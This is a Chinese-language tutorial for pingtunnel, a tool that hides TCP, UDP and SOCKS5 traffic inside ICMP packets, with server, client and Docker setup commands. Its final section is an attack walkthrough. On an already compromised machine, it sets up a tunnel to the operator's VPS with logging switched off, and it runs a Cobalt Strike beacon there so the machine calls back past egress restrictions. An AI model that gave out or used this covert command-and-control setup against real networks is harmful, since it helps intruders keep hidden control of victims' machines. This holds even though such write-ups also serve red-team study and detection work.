pingtunnel 是tcp/udp/sock5 流量伪装成icmp流量进行转发的工具。
安装服务端
- 首先准备好一个具有公网 ip 的服务器,假定域名或者公网 ip 是www.yourserver.com
- 从releases下载对应的安装包,如 pingtunnel_linux64.zip,然后解压,以root权限执行
sudo wget (最新release的下载链接) sudo unzip pingtunnel_linux64.zip sudo ./pingtunnel -type server
(可选)关闭系统默认的 ping
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all
安装客户端
- 从releases下载对应的安装包,如 pingtunnel_windows64.zip,解压
- 然后用管理员权限运行,不同的转发功能所对应的命令如下
- 如果看到有 ping pong 的 log,说明连接正常
转发 sock5
pingtunnel.exe -type client -l :4455 -s www.yourserver.com -sock5 1
转发 tcp
pingtunnel.exe -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455 -tcp 1
转发 udp
pingtunnel.exe -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455
Docker
也可直接用docker启动,更方便。参数同上
- server:
docker run --name pingtunnel-server -d --privileged --network host --restart=always esrrhs/pingtunnel ./pingtunnel -type server -key 123456
client:
docker run --name pingtunnel-client -d --restart=always -p 1080:1080 esrrhs/pingtunnel ./pingtunnel -type c
PingTunnel跟cobalt strike一起用
这个实验主要想说明端口转发,假设场景拿下一台机器icmp出网只有1234端口出网。
第一步在自己公网vps设置监听
在拿下客户机运行如下命令本地8001端口转发到公vps上1234端口
pingtunnel.exe -type client -l :8001 -s192.168.254.133 -t 192.168.254.133:1234 -tcp 1 - noprint 1 -nolog 1
在公网vps设置两个监听器一个是127.0.0.1 8001 一个是公网vps 1234
可以看到CS上反弹回来
监听器127.0.0.1生成beacon运行在被攻击机上
192.168.254.133模拟的是公网vps